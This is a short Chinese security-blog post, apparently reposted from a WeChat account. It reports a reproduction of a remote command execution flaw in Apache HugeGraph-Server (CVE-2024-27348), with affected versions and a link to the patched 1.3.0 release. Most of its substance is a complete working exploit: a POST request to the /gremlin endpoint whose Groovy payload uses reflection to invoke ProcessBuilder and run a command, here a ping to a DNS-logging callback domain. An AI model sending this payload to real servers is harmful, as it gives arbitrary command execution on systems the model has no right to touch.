Apache HugeGraph是美国阿帕奇(Apache)基金会的一个速度快、可扩展性强的图形数据库。
Apache HugeGraph 1.0.0至1.3.0之前版本存在安全漏洞,该漏洞源于存在远程命令执行(RCE)漏洞。
1.0.0 <= HugeGraph-Server < 1.3.0
1.访问漏洞环境
POC
漏洞复现
POST /gremlin HTTP/1.1Host: 127.0.0.1Content-Type: application/jsonContent-Length: 382{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName("java.lang.Thread");java.lang.reflect.Field field = clz.getDeclaredField("name");field.setAccessible(true);field.set(thread, "SL7");Class processBuilderClass = Class.forName("java.lang.ProcessBuilder");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList("ping", "pkay8w.dnslog.cn");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod("start");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
测试dnslog命令执行成功
3.Yakit工具加载nuclei文件测试(漏洞存在)
https://hugegraph.apache.org/docs/download/download/https://github.com/apache/incubator-hugegraph/releases/tag/1.3.0
原文始发于微信公众号(弥天安全实验室):【成功复现】Apache HugeGraph-Server远程命令执行漏洞(CVE-2024-27348)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论